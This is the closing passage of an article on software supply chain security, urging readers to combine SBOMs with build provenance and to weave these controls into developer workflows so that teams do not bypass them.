The shift from static SBOMs to living, enriched documents with cryptographic provenance represents a fundamental change in how we think about supply chain security. Compliance frameworks are starting to catch up. The EU Cyber Resilience Act and CISA guidance increasingly demand both SBOMs and evidence of build integrity.
The practical path forward starts with assessing your current posture. Do you know what is in your artifacts? Do you know how they were built? Can you verify that the binary in production matches the source code in your repository? If the answer to any of these questions is unclear, you have identified your starting point.
SBOM generation without provenance verification is half-measures. Provenance without continuous enrichment is incomplete. The hard problem is not implementing these controls. The hard problem is integrating them into developer workflows without creating friction that drives teams to work around security.
I have seen this pattern repeatedly in twenty years of offensive security. Security that creates friction gets bypassed. Security that integrates seamlessly gets used. The organizations that succeed treat supply chain hardening as a developer experience problem, not just a security problem.
That means investing in tooling that makes the secure path the easy path. It means automating verification so that policy enforcement happens without manual intervention. It means measuring success by reduced time to remediation, not by the number of SBOMs generated.
The work is worth doing. Every control you add to your supply chain raises the cost of a successful attack. The attackers behind SolarWinds, XZ Utils, and the next unnamed incident are looking for easy targets. Make yourself a harder one.
This is not a theoretical exercise. The attack patterns I described are documented, analyzed, and still reproducible in most environments. The question is not whether your organization is a target. The question is whether you have made yourself visible enough that an attacker notices and moves on to something easier.